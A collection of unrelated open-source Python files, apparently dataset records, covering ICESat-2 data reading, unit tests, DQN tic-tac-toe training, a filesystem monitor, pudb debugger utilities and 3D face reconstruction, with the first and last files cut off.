The default describes files downloaded directly from NSIDC (subsetted and non-subsetted).
catalog : string, default None
Full path to an Intake catalog for reading in data.
If you still need to create a catalog, leave as default.
out_obj_type : object, default xarray.Dataset
The desired format for the data to be read in.
Currently, only xarray.Dataset objects (default) are available.
Please ask us how to help enable usage of other data objects!
Returns
-------
read object
Examples
--------
"""
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data_source=None,
filename_pattern="ATL{product:2}_{datetime:%Y%m%d%H%M%S}_{rgt:4}{cycle:2}{orbitsegment:2}_{version:3}_{revision:2}.h5",
catalog=None,
out_obj_type=None, # xr.Dataset,
):
if data_source == None:
raise ValueError("Please provide a data source.")
else:
assert _validate_source(data_source)
self.data_source = data_source
assert _check_source_for_pattern(data_source, filename_pattern)
# Note: need to check if this works for subset and non-subset NSIDC files (processed_ prepends the former)
self._pattern = filename_pattern
# after validation, use the notebook code and code outline to start implementing the rest of the class
if catalog:
print("validate catalog")
self._catalog_path = catalog
if out_obj_type:
print(
"Output object type will be an xarray DataSet - no other output types are implemented"
)
self._out_obj = xr.Dataset
self._source_type = _get_datasource_type()
# ----------------------------------------------------------------------
# Properties
@property
def catalog(self):
"""
Print the catalog.
Examples
--------
>>>
"""
if not hasattr(self, "_catalog"):
return open(self._catalog_path, "r").read()
else:
return self._catalog
# ----------------------------------------------------------------------
# Methods
def build_catalog(self, var_paths="/gt1l/land_ice_segments", **kwargs):
""""""
from intake.catalog.local import LocalCatalogEntry
import intake_xarray
import icepyx.core.APIformatting as apifmt
xarray_kwargs_dict = {"engine": "h5netcdf", "group": var_paths}
source_args_dict = {
"urlpath": self.data_source,
"path_as_pattern": self._pattern,
"xarray_kwargs": xarray_kwargs_dict,
}
metadata_dict = {"version": 1}
source_dict = {
"name": self._source_type,
"description": "",
"driver": intake_xarray.netcdf.NetCDFSource,
"args": source_args_dict,
}
local_cat_source = {self._source_type: LocalCatalogEntry(**source_dict)}
defaults_dict = {
"name": "IS2-hdf5-icepyx-intake-catalog",
"description": "an icepyx-generated catalog for creating local ICESat-2 intake entries",
"metadata": metadata_dict,
"entries": local_cat_source,
}
build_cat_dict = apifmt.combine_params(defaults_dict, kwargs)
self._catalog = Catalog.from_dict(**build_cat_dict) | StarcoderdataPython |
127949 | '''
__iter__
如果一个类想被用于for ... in循环,类似list或tuple那样,就必须实现一个__iter__()方法
__getitem__
使实例可以像list一样通过下标获取元素
'''
class demo02:
def __init__(self):
self.a, self.b = 0, 1 # 初始化两个计数器a,b
def __iter__(self):
return self # 实例本身就是迭代对象,故返回自己
def __next__(self):
if self.a != 0:
self.a = self.a + 2
if(self.a > 100):
raise StopIteration()
return self.a
def __getitem__(self, item):
list1 = range(0,101,2)
return list1[item]
for x in demo02():
print(x)
print(demo02()[3])
| StarcoderdataPython |
166267 | import os
import unittest
from dotenv import dotenv_values
from skyflow.service_account._token import *
from skyflow.service_account import is_expired
class TestGenerateBearerToken(unittest.TestCase):
def setUp(self) -> None:
self.dataPath = os.path.join(
os.getcwd(), 'tests/service_account/data/')
return super().setUp()
def testIsExpiredInvalidToken(self):
try:
token = 'invalid token'
self.assertEqual(True, is_expired(token))
except SkyflowError as se:
self.fail('raised exception for invalid token')
def testIsExpiredEmptyToken(self):
try:
self.assertEqual(True, is_expired(''))
except SkyflowError as se:
self.fail('Error '+str(se.message))
def testIsExpiredTokenExpred(self):
expiredToken = '<KEY>'
try:
self.assertEqual(True, is_expired(expiredToken))
except SkyflowError:
self.fail('raised error for expired token')
| StarcoderdataPython |
3336664 |
from transformers import pipeline
unmasker = pipeline('fill-mask', model='bert-base-uncased')
unmasker("Hello I'm a [MASK] model.")
[{'sequence': "[CLS] hello i'm a fashion model. [SEP]",
'score': 0.1073106899857521,
'token': 4827,
'token_str': 'fashion'},
{'sequence': "[CLS] hello i'm a role model. [SEP]",
'score': 0.08774490654468536,
'token': 2535,
'token_str': 'role'},
{'sequence': "[CLS] hello i'm a new model. [SEP]",
'score': 0.05338378623127937,
'token': 2047,
'token_str': 'new'},
{'sequence': "[CLS] hello i'm a super model. [SEP]",
'score': 0.04667217284440994,
'token': 3565,
'token_str': 'super'},
{'sequence': "[CLS] hello i'm a fine model. [SEP]",
'score': 0.027095865458250046,
'token': 2986,
'token_str': 'fine'}]
| StarcoderdataPython |
73752 | import pytest
from click.testing import CliRunner
import dodola.cli
import dodola.services
@pytest.mark.parametrize(
"subcmd",
[
None,
"biascorrect",
"buildweights",
"rechunk",
"regrid",
"train-qdm",
"apply-qdm",
"correct-wetday-frequency",
"train-aiqpd",
"apply-aiqpd",
],
ids=(
"--help",
"biascorrect --help",
"buildweights --help",
"rechunk --help",
"regrid --help",
"train-qdm --help",
"apply-qdm --help",
"correct-wetday-frequency --help",
"train-aiqpd --help",
"apply-aiqpd --help",
),
)
def test_cli_helpflags(subcmd):
"""Test that CLI commands and subcommands don't throw Error if given --help flag"""
runner = CliRunner()
# Setup CLI args
cli_args = ["--help"]
if subcmd is not None:
cli_args = [subcmd, "--help"]
result = runner.invoke(dodola.cli.dodola_cli, cli_args)
assert "Error:" not in result.output
| StarcoderdataPython |
3207915 | # Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from sushy_tools.emulator.resources import managers
from sushy_tools import error
class FakeDriverTestCase(base.BaseTestCase):
def setUp(self):
super(FakeDriverTestCase, self).setUp()
self.identity = 'xxx'
self.systems = mock.Mock(systems=[self.identity])
self.systems.uuid.return_value = 'xxx'
self.systems.name.return_value = 'name'
self.manager = {'UUID': self.identity,
'Id': self.identity,
'Name': 'name-Manager'}
self.chassis = mock.Mock(chassis=[])
self.test_driver = managers.FakeDriver({}, mock.Mock(),
self.systems, self.chassis)
def test_get_manager_not_found(self):
self.systems.uuid.side_effect = error.FishyError('boom')
self.assertRaises(
error.FishyError, self.test_driver.get_manager, 'foo')
def test_get_manager_by_uuid(self):
manager = self.test_driver.get_manager('xxx')
self.assertEqual(self.manager, manager)
def test_managers(self):
result = self.test_driver.managers
self.assertEqual([self.identity], result)
def test_managed_systems(self):
self.assertEqual(
['xxx'], self.test_driver.get_managed_systems(self.manager))
| StarcoderdataPython |
1639483 | from django.urls import path
from .views import upload_file_view
urlpatterns = [
path("", upload_file_view, name="upload-view"),
] | StarcoderdataPython |
3365268 | <reponame>TobiasBrx/AlphaToe
"""
It is important to note that if the second player is randomized without knowing the rules,
their performance is so bad that the DQN algorithm simply learns how to play legal moves
and waits until the random opponent makes an illegal move which causes the DQN agent to win.
It is extremely unlikely that a randomized opponent wins or even draws under these curcumstances.
We achieve a win rate of >99% for the DQN agent against such a randomized opponent with around 0.2%
winning games for the randomized opponent and 0.4 drawing games.
"""
"""
On the other hand when we allow the randomized opponent to know the rules of the game we can
witness a beautiful learning curve of the DQN agent from not knowing the rules to
fully understanding the game and playing on a high (optimal?) level.
Starting from <5% winning games in the first 1000 games to about 50% after 50000 games (that corresponds
to playing as good as a randomized opponent who knows the rules and can thus be interpreted as
having learned the rules).
After about 100000 episodes the DQN agent dominates the random opponent with about 80% winning chances
but he does not find the Nash equilibrium strategy to not lose any games. Training from then on
accomplishes an increase in performance to about 98% winning rate but again the rest of the games
are lost and not drawn.
It is also interesting to note that the agent prioritizes to prevent the opponent from winning over
winning themselve. If it is their turn and to win in 1 move they prefer to stop the opponent from winning
in 1 move and play on.
"""
############################### Imports ##################################
import collections
import os
import random
import numpy as np
import tensorflow as tf
from common.network_helpers import load_network, save_network
###############################################################################
def get_td_network_move(session, input_layer, output_layer, board_state, side, eps=0.1,
valid_only=False, game_spec=None, ):
"""Choose a move for the given board_state using a stocastic policy. A move is selected using epsilon greedy
strategy of the values from the output_layer. With epsilon probability a random move is chosen and with
1-epsilon probability the move with the highest Q-value is chosen.
Args:
session (tf.Session): Session used to run this network
input_layer (tf.Placeholder): Placeholder to the network used to feed in the board_state
output_layer (tf.Tensor): Tensor that will output the probabilities of the moves, we expect this to be of
dimesensions (None, board_squares) and the sum of values across the board_squares to be 1.
board_state: The board_state we want to get the move for.
side: The side that is making the move.
Returns:
(np.array) It's shape is (board_squares), and it is a 1 hot encoding for the move the network has chosen.
"""
np_board_state = np.array(board_state)
if side == -1:
np_board_state = -np_board_state
np_board_state = np_board_state.reshape(1, *input_layer.get_shape().as_list()[1:])
Q_values_of_actions = session.run(output_layer,
feed_dict={input_layer: np_board_state})[0]
if valid_only:
available_moves = list(game_spec.available_moves(board_state))
if len(available_moves) == 1:
move = np.zeros(game_spec.board_squares())
np.put(move, game_spec.tuple_move_to_flat(available_moves[0]), 1)
return move
available_moves_flat = [game_spec.tuple_move_to_flat(x) for x in available_moves]
if np.random.rand() < eps:
pick = random.choice(available_moves_flat)
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
return move
for i in range(game_spec.board_squares()):
if i not in available_moves_flat:
Q_values_of_actions[i] = - np.inf
pick = np.argmax(Q_values_of_actions)
best_move = np.zeros(game_spec.board_squares())
np.put(best_move, pick, 1)
return best_move
else:
if np.random.rand() < eps:
pick = random.choice(np.arange(9))
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
return move
else:
pick = np.argmax(Q_values_of_actions)
best_move = np.zeros(game_spec.board_squares())
np.put(best_move, pick, 1)
return best_move
###############################################################################
log_ = False # just for logging purposes
def DQN_train(game_spec,
create_network, # this should have scope principal
create_network_2,
create_target_network, # this should have scope "target
create_target_network_2,
network_file_path,
save_network_file_path=None,
opponent_func=None,
number_of_games=10000,
print_results_every=1000,
learn_rate=1e-4,
batch_size=100,
randomize_first_player=True):
"""Train a network using the DQN algorithm with replay buffer, a principal and a target network
Args:
save_network_file_path (str): Optionally specifiy a path to use for saving the network, if unset then
the network_file_path param is used.
opponent_func (board_state, side) -> move: Function for the opponent, if unset we use an opponent playing
randomly
randomize_first_player (bool): If True we alternate between being the first and second player
game_spec (games.base_game_spec.BaseGameSpec): The game we are playing
create_network (->(input_layer : tf.placeholder, output_layer : tf.placeholder, variables : [tf.Variable])):
Method that creates the network we will train.
network_file_path (str): path to the file with weights we want to load for this network
number_of_games (int): number of games to play before stopping
print_results_every (int): Prints results to std out every x games, also saves the network
learn_rate (float):
batch_size (int):
Returns:
(variables used in the final network : list, win rate: float)
"""
p1wins = np.array([])
p2wins = np.array([])
drawsarr = np.array([])
input_layer, output_layer, variables = create_network()
input_layer_2, output_layer_2, variables_2 = create_network_2()
input_layer_t, output_layer_t, variables_t = create_target_network()
input_layer_t2, output_layer_t2, variables_t2 = create_target_network_2()
target_1 = tf.placeholder("float", shape=(None))
#target_2 = tf.placeholder("float", shape=(None))
actual_move_placeholder = tf.placeholder("float", shape=(None, game_spec.outputs()))
#actual_move_placeholder_2 = tf.placeholder("float", shape=(None, game_spec.outputs()))
prediction = tf.reduce_sum(actual_move_placeholder*output_layer, axis=1)
#prediction_2 = tf.reduce_sum(actual_move_placeholder_2*output_layer_2, axis=1)
td_gradient_1 = tf.reduce_mean(tf.square(prediction - target_1))
#td_gradient_2 = tf.reduce_mean(tf.square(prediction_2 - target_2))
train_step = tf.train.AdamOptimizer(learn_rate).minimize(td_gradient_1)
#train_step_2 = tf.train.AdamOptimizer(learn_rate).minimize(td_gradient_2)
gamma = 0.99
tau = 100
###############################################################################
#To copy the principal to the target network
def build_target_update(from_scope, to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=to_scope)
op = []
for v1, v2 in zip(from_vars, to_vars):
op.append(v2.assign(v1))
return op
update = build_target_update("principal", "target")
###############################################################################
with tf.Session() as session:
session.run(tf.global_variables_initializer())
if network_file_path and os.path.isfile(network_file_path):
print(f"Loading pre-existing network from {network_file_path}")
load_network(session, variables, network_file_path)
mini_batch_board_states, mini_batch_moves, mini_batch_rewards = [], [], []
mini_batch_board_states_2, mini_batch_moves_2, mini_batch_rewards_2 = [], [], []
mini_batch_board_states_temp, mini_batch_next_board_states = [], []
mini_batch_board_states_temp_2, mini_batch_next_board_states_2 = [], []
results = collections.deque(maxlen=print_results_every)
results_2 = collections.deque(maxlen=print_results_every)
###############################################################################
def make_training_move(board_state, side, eps):
mini_batch_board_states.append(np.ravel(board_state) * side)
#epsilon greedy choice of the next move
move = get_td_network_move(session, input_layer, output_layer, board_state,
side, eps, valid_only=False, game_spec=game_spec) # valid_only=True, game_spec=game_spec
mini_batch_moves.append(move)
return game_spec.flat_move_to_tuple(move.argmax())
###############################################################################
#It has the option of letting the user play the game when log_ is set to
# "Interactive"
def make_training_move_2(board_state, side, eps):
"""
To have the second player play randomly, change positional argument eps in get_td_network_move() to > eps=1 <.
To have the second player play epsilon greedily, leave positional argument eps in get_td_network_move() as > eps < (from
make_training_move_2(..., eps)).
"""
global log_
mini_batch_board_states_2.append(np.ravel(board_state) * side)
if log_ == "Interactive":
pick = np.int(input("Enter Move (0-9): "))
move = np.zeros(game_spec.board_squares())
np.put(move, pick, 1)
mini_batch_moves_2.append(move)
return game_spec.flat_move_to_tuple((move.argmax()))
#epsilon greedy choice of the next move
else: move = get_td_network_move(session, input_layer_2, output_layer_2, board_state,
side, eps=1, valid_only=True, game_spec=game_spec) # valid_only=True
mini_batch_moves_2.append(move)
return game_spec.flat_move_to_tuple(move.argmax())
############################### Training ##################################
for episode_number in range(1, number_of_games):
global log_
log_ = False
if episode_number % 20000 == 0:
log_=True
# change log_ to log_ = "Interactive" to play against the current network
eps = np.exp(-10*episode_number/number_of_games) #5000/episode_number # np.exp(-5*episode_number/200000)
if (not randomize_first_player) or bool(random.getrandbits(1)):
if log_:
print("Player 1 starts with symbol 1. Player 2 follows with symbol -1")
reward = game_spec.play_game_eps(make_training_move, make_training_move_2, eps, log = log_)
reward_2 = - reward
else:
if log_:
print("Player 2 starts with symbol 1. Player 1 follows with symbol -1")
reward = -game_spec.play_game_eps(make_training_move_2, make_training_move, eps, log = log_)
reward_2 = - reward
results.append(reward)
results_2.append(reward_2)
# we scale here so winning quickly is better winning slowly and loosing slowly better than loosing quick
last_game_length = len(mini_batch_board_states) - len(mini_batch_rewards)
last_game_length_2 = len(mini_batch_board_states_2) - len(mini_batch_rewards_2)
reward /= float(last_game_length)
reward_2 /= float(last_game_length_2)
mini_batch_rewards += ([reward] * (last_game_length))# remember that this applies a reward to the whole game!!
#mini_batch_rewards += [0]*(last_game_length-1)+[reward]
mini_batch_rewards_2 += ([reward_2] * last_game_length_2) # Changes learning dynmics. No sparse reward environment anymore.
#mini_batch_rewards_2 += [0]*(last_game_length_2-1)+[reward_2]
length = len(mini_batch_board_states_temp)
mini_batch_board_states_temp = np.copy(mini_batch_board_states)
new_moves = mini_batch_board_states[length:]
mini_batch_next_board_states += (new_moves[1:]+[np.array([0,0,0,0,0,0,0,0,0])])
length_2 = len(mini_batch_board_states_temp_2)
mini_batch_board_states_temp_2 = np.copy(mini_batch_board_states_2)
new_moves_2 = mini_batch_board_states_2[length_2:]
mini_batch_next_board_states_2 += (new_moves_2[1:]+[np.array([0,0,0,0,0,0,0,0,0])])
if episode_number % batch_size == 0:
normalized_rewards = mini_batch_rewards - np.mean(mini_batch_rewards)
normalized_rewards_2 = mini_batch_rewards_2 - np.mean(mini_batch_rewards_2)
rewards_std = np.std(normalized_rewards)
rewards_std_2 = np.std(normalized_rewards_2)
if rewards_std != 0:
normalized_rewards /= rewards_std
else:
print("warning: got mini batch std of 0.")
if rewards_std_2 != 0:
normalized_rewards_2 /= rewards_std_2
else:
print("warning: got mini batch 2 std of 0.")
np_mini_batch_board_states = np.array(mini_batch_board_states) \
.reshape(len(mini_batch_rewards), *input_layer.get_shape().as_list()[1:])
#np_mini_batch_board_states_2 = np.array(mini_batch_board_states_2) \
# .reshape(len(mini_batch_rewards_2), *input_layer_2.get_shape().as_list()[1:])
np_mini_batch_next_board_states = np.array(mini_batch_next_board_states) \
.reshape(len(mini_batch_rewards), *input_layer.get_shape().as_list()[1:])
#np_mini_batch_next_board_states_2 = np.array(mini_batch_next_board_states_2) \
# .reshape(len(mini_batch_rewards_2), *input_layer_2.get_shape().as_list()[1:])
Q_targets = np.max(session.run(output_layer_t,
feed_dict={input_layer_t: np_mini_batch_next_board_states}), axis=1)
done = [0 if all([x == 0 for x in i]) else 1 for i in np_mini_batch_next_board_states]
targets_ = mini_batch_rewards + gamma*Q_targets*done
session.run(train_step, feed_dict={input_layer: np_mini_batch_board_states, \
actual_move_placeholder: mini_batch_moves, target_1: targets_})
if (episode_number%tau == 0):
session.run(update)
###############################################################################
# clear batches
del mini_batch_board_states[:]
del mini_batch_moves[:]
del mini_batch_rewards[:]
del mini_batch_board_states_2[:]
del mini_batch_moves_2[:]
del mini_batch_rewards_2[:]
mini_batch_next_board_states = []
mini_batch_next_board_states_2 = []
length, length_2 = 0, 0
mini_batch_board_states_temp = []
mini_batch_board_states_temp_2 = []
new_moves = []
new_moves_2 = []
############################### Results ##################################
if episode_number % print_results_every == 0:
draws = sum([x == 0 for x in results])
print(" Player 1: episode: %s win_rate: %s" % (episode_number, _win_rate_strict(print_results_every, results)))
print(" Player 2: episode: %s win_rate: %s" % (episode_number, _win_rate_strict(print_results_every, results_2)))
print(f'Proportion of Draws: = {draws/print_results_every}')
p1wins = np.append(p1wins, _win_rate_strict(print_results_every, results))
p2wins = np.append(p2wins, _win_rate_strict(print_results_every, results_2))
drawsarr = np.append(drawsarr, draws/print_results_every)
#################### ANALYSIS & LOGGING ###################################
if episode_number % 50000 == 0:
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([0,1,-1,-1,1,0,0,0,0],0)})
print(f'Q-values: {Q}')
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([0,1,1,-1,-1,0,0,0,0],0)})
print(f'Q-values: {Q}')
Q = session.run(output_layer_t,
feed_dict={input_layer_t: np.expand_dims([-1,-1,0,0,-1,1,1,1,0],0)})
print(f'Q-values: {Q}')
###############################################################################
if save_network_file_path:
print(f"Saving Network at {save_network_file_path}")
save_network(session, variables, save_network_file_path)
#return variables, _win_rate(print_results_every, results)
return p1wins, p2wins, drawsarr
###############################################################################
def _win_rate(print_results_every, results):
return 0.5 + sum(results) / (print_results_every * 2.)
def _win_rate_strict(print_results_every, results):
wins = sum([x == 1 for x in results])
return wins / (print_results_every)
| StarcoderdataPython |
23226 | # Copyright (c) 2012 <NAME> <<EMAIL>>
#
# This is free software released under the MIT license.
# See COPYING file for details, or visit:
# http://www.opensource.org/licenses/mit-license.php
#
# The file is part of FSMonitor, a file-system monitoring library.
# https://github.com/shaurz/fsmonitor
import sys, os, time, threading, errno
from .common import FSEvent, FSMonitorError
def get_dir_contents(path):
return [(filename, os.stat(os.path.join(path, filename)))
for filename in os.listdir(path)]
class FSMonitorDirWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._contents = get_dir_contents(path)
self._deleted = False
except OSError as e:
self._contents = []
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorDirWatch %r>" % self.path
@classmethod
def new_state(cls, path):
return [(filename, os.stat(os.path.join(path, filename)))
for filename in os.listdir(path)]
def getstate(self):
return self._contents
def delstate(self):
self._contents = []
self._deleted = True
def setstate(self, state):
self._contents = state
self._deleted = False
state = property(getstate, setstate, delstate)
class FSMonitorFileWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._stat = os.stat(path)
self._deleted = False
except OSError as e:
self._stat = None
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorFileWatch %r>" % self.path
@classmethod
def new_state(cls, path):
return os.stat(path)
def getstate(self):
return self._stat
def delstate(self):
self._stat = None
self._deleted = True
def setstate(self, state):
self._stat = state
self._deleted = False
state = property(getstate, setstate, delstate)
class FSMonitorWatch(object):
def __init__(self, path, flags, user):
self.path = path
self.flags = flags
self.user = user
self.enabled = True
self._timestamp = time.time()
try:
self._contents = get_dir_contents(path)
self._deleted = False
except OSError as e:
self._contents = []
self._deleted = (e.errno == errno.ENOENT)
def __repr__(self):
return "<FSMonitorWatch %r>" % self.path
def _compare_contents(watch, new_contents, events_out, before):
name_to_new_stat = dict(new_contents)
for name, old_stat in watch._contents:
new_stat = name_to_new_stat.get(name)
if new_stat:
_compare_stat(watch, new_stat, events_out, before, old_stat, name)
else:
events_out.append(FSEvent(watch, FSEvent.Delete, name))
old_names = frozenset(x[0] for x in watch._contents)
for name, new_stat in new_contents:
if name not in old_names:
events_out.append(FSEvent(watch, FSEvent.Create, name))
def _compare_stat(watch, new_stat, events_out, before, old_stat, filename):
if new_stat.st_atime != old_stat.st_atime and new_stat.st_atime < before:
events_out.append(FSEvent(watch, FSEvent.Access, filename))
if new_stat.st_mtime != old_stat.st_mtime:
events_out.append(FSEvent(watch, FSEvent.Modify, filename))
def round_fs_resolution(t):
if sys.platform == "win32":
return t // 2 * 2
else:
return t // 1
class FSMonitor(object):
def __init__(self):
self.__lock = threading.Lock()
self.__dir_watches = set()
self.__file_watches = set()
self.polling_interval = 0.5
@property
def watches(self):
with self.__lock:
return list(self.__dir_watches) + list(self.__file_watches)
def add_dir_watch(self, path, flags=FSEvent.All, user=None):
watch = FSMonitorDirWatch(path, flags, user)
with self.__lock:
self.__dir_watches.add(watch)
return watch
def add_file_watch(self, path, flags=FSEvent.All, user=None):
watch = FSMonitorFileWatch(path, flags, user)
with self.__lock:
self.__file_watches.add(watch)
return watch
def remove_watch(self, watch):
with self.__lock:
if watch in self.__dir_watches:
self.__dir_watches.discard(watch)
elif watch in self.__file_watches:
self.__file_watches.discard(watch)
def remove_all_watches(self):
with self.__lock:
self.__dir_watches.clear()
self.__file_watches.clear()
def enable_watch(self, watch, enable=True):
watch.enabled = enable
def disable_watch(self, watch):
watch.enabled = False
def read_events(self, timeout=None):
now = start_time = time.time()
watches = self.watches
watches.sort(key=lambda watch: abs(now - watch._timestamp), reverse=True)
events = []
for watch in watches:
now = time.time()
if watch._timestamp < now:
tdiff = now - watch._timestamp
if tdiff < self.polling_interval:
time.sleep(self.polling_interval - tdiff)
watch._timestamp = now
if not watch.enabled:
continue
before = round_fs_resolution(time.time())
try:
new_state = watch.new_state(watch.path)
except OSError as e:
if e.errno == errno.ENOENT:
if not watch._deleted:
del watch.state
events.append(FSEvent(watch, FSEvent.DeleteSelf))
else:
if isinstance(watch, FSMonitorDirWatch):
_compare_contents(watch, new_state, events, before)
elif isinstance(watch, FSMonitorFileWatch):
_compare_stat(watch, new_state, events, before,
watch.state, watch.path)
watch.state = new_state
return events
| StarcoderdataPython |
3369937 | <reponame>albfan/pudb
from __future__ import absolute_import, division, print_function
from pudb.py3compat import PY3
# {{{ breakpoint validity
def generate_executable_lines_for_code(code):
l = code.co_firstlineno
yield l
if PY3:
for c in code.co_lnotab[1::2]:
l += c
yield l
else:
for c in code.co_lnotab[1::2]:
l += ord(c)
yield l
def get_executable_lines_for_file(filename):
# inspired by rpdb2
from linecache import getlines
codes = [compile("".join(getlines(filename)), filename, "exec")]
from types import CodeType
execable_lines = set()
while codes:
code = codes.pop()
execable_lines |= set(generate_executable_lines_for_code(code))
codes.extend(const
for const in code.co_consts
if isinstance(const, CodeType))
return execable_lines
def get_breakpoint_invalid_reason(filename, lineno):
# simple logic stolen from pdb
import linecache
line = linecache.getline(filename, lineno)
if not line:
return "Line is beyond end of file."
try:
executable_lines = get_executable_lines_for_file(filename)
except SyntaxError:
return "File failed to compile."
if lineno not in executable_lines:
return "No executable statement found in line."
def lookup_module(filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
# stolen from pdb
import os
import sys
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f): # and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
# }}}
# {{{ file encoding detection
# stolen from Python 3.1's tokenize.py, by <NAME>
import re
cookie_re = re.compile("^\s*#.*coding[:=]\s*([-\w.]+)")
from codecs import lookup, BOM_UTF8
if PY3:
BOM_UTF8 = BOM_UTF8.decode()
def detect_encoding(readline):
"""
The detect_encoding() function is used to detect the encoding that should
be used to decode a Python source file. It requires one argment, readline,
in the same way as the tokenize() generator.
It will call readline a maximum of twice, and return the encoding used
(as a string) and a list of any lines (left as bytes) it has read
in.
It detects the encoding from the presence of a utf-8 bom or an encoding
cookie as specified in pep-0263. If both a bom and a cookie are present,
but disagree, a SyntaxError will be raised. If the encoding cookie is an
invalid charset, raise a SyntaxError.
If no encoding is specified, then the default of 'utf-8' will be returned.
"""
bom_found = False
encoding = None
def read_or_stop():
try:
return readline()
except StopIteration:
return ''
def find_cookie(line):
try:
if PY3:
line_string = line
else:
line_string = line.decode('ascii')
except UnicodeDecodeError:
return None
matches = cookie_re.findall(line_string)
if not matches:
return None
encoding = matches[0]
try:
codec = lookup(encoding)
except LookupError:
# This behaviour mimics the Python interpreter
raise SyntaxError("unknown encoding: " + encoding)
if bom_found and codec.name != 'utf-8':
# This behaviour mimics the Python interpreter
raise SyntaxError('encoding problem: utf-8')
return encoding
first = read_or_stop()
if first.startswith(BOM_UTF8):
bom_found = True
first = first[3:]
if not first:
return 'utf-8', []
encoding = find_cookie(first)
if encoding:
return encoding, [first]
second = read_or_stop()
if not second:
return 'utf-8', [first]
encoding = find_cookie(second)
if encoding:
return encoding, [first, second]
return 'utf-8', [first, second]
# }}}
# {{{ traceback formatting
class StringExceptionValueWrapper:
def __init__(self, string_val):
self.string_val = string_val
def __str__(self):
return self.string_val
__context__ = None
__cause__ = None
def format_exception(exc_tuple):
# Work around http://bugs.python.org/issue17413
# See also https://github.com/inducer/pudb/issues/61
from traceback import format_exception
if PY3:
exc_type, exc_value, exc_tb = exc_tuple
if isinstance(exc_value, str):
exc_value = StringExceptionValueWrapper(exc_value)
exc_tuple = exc_type, exc_value, exc_tb
return format_exception(
*exc_tuple,
**dict(chain=hasattr(exc_value, "__context__")))
else:
return format_exception(*exc_tuple)
# }}}
# vim: foldmethod=marker
| StarcoderdataPython |
69336 | import tensorflow as tf
import numpy as np
from PIL import Image
import os
import glob
import platform
import argparse
from scipy.io import loadmat,savemat
from preprocess_img import align_img
from utils import *
from face_decoder import Face3D
from options import Option
is_windows = True
def parse_args():
desc = "Deep3DFaceReconstruction"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('--pretrain_weights', type=str, default=None, help='path for pre-trained model')
parser.add_argument('--use_pb', type=int, default=1, help='validation data folder')
return parser.parse_args()
def restore_weights(sess,opt):
var_list = tf.trainable_variables()
g_list = tf.global_variables()
# add batch normalization params into trainable variables
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list +=bn_moving_vars
# create saver to save and restore weights
saver = tf.train.Saver(var_list = var_list)
saver.restore(sess,opt.pretrain_weights)
"""
Files in the input directory are arranged as
Folder1
Folder1_A0
Folder1_A1
Folder1_A2
....
Folder2
Folder2_A0
Folder2_A1
Folder2_A2
...
Folder3
Folder3_A0
Folder3_A1
Folder3_A2
...
"""
def demo():
# input and output folder
args = parse_args()
image_path = 'input'
save_path = 'output'
if not os.path.exists(save_path):
os.makedirs(save_path)
folder_list = glob.glob(image_path)
# img_list = glob.glob(image_path + '/' + '*.png')
# img_list +=glob.glob(image_path + '/' + '*.jpg')
# read BFM face model
# transfer original BFM model to our model
if not os.path.isfile('./BFM/BFM_model_front.mat'):
transferBFM09()
# read standard landmarks for preprocessing images
lm3D = load_lm3d()
n = 0
# build reconstruction model
with tf.Graph().as_default() as graph,tf.device('/cpu:0'):
opt = Option(is_train=False)
opt.batch_size = 1
opt.pretrain_weights = args.pretrain_weights
FaceReconstructor = Face3D()
images = tf.placeholder(name = 'input_imgs', shape = [opt.batch_size,224,224,3], dtype = tf.float32)
if args.use_pb and os.path.isfile('network/FaceReconModel.pb'):
print('Using pre-trained .pb file.')
graph_def = load_graph('network/FaceReconModel.pb')
tf.import_graph_def(graph_def,name='resnet',input_map={'input_imgs:0': images})
# output coefficients of R-Net (dim = 257)
coeff = graph.get_tensor_by_name('resnet/coeff:0')
else:
print('Using pre-trained .ckpt file: %s'%opt.pretrain_weights)
import networks
coeff = networks.R_Net(images,is_training=False)
# reconstructing faces
FaceReconstructor.Reconstruction_Block(coeff,opt)
face_shape = FaceReconstructor.face_shape_t
face_texture = FaceReconstructor.face_texture
face_color = FaceReconstructor.face_color
landmarks_2d = FaceReconstructor.landmark_p
recon_img = FaceReconstructor.render_imgs
tri = FaceReconstructor.facemodel.face_buf
with tf.Session() as sess:
if not args.use_pb :
restore_weights(sess,opt)
print('reconstructing...')
for folder in folder_list:
img_list = glob.glob(folder+"/*")
os.mkdir(folder.replace("input","output"))
save_path = folder.replace("input","output")
for file in img_list:
n += 1
print(n)
# load images and corresponding 5 facial landmarks
lm_file =file.replace('JPG','txt')
if(not os.path.isfile(lm_file)):
continue
img,lm = load_img(file,lm_file)
# preprocess input image
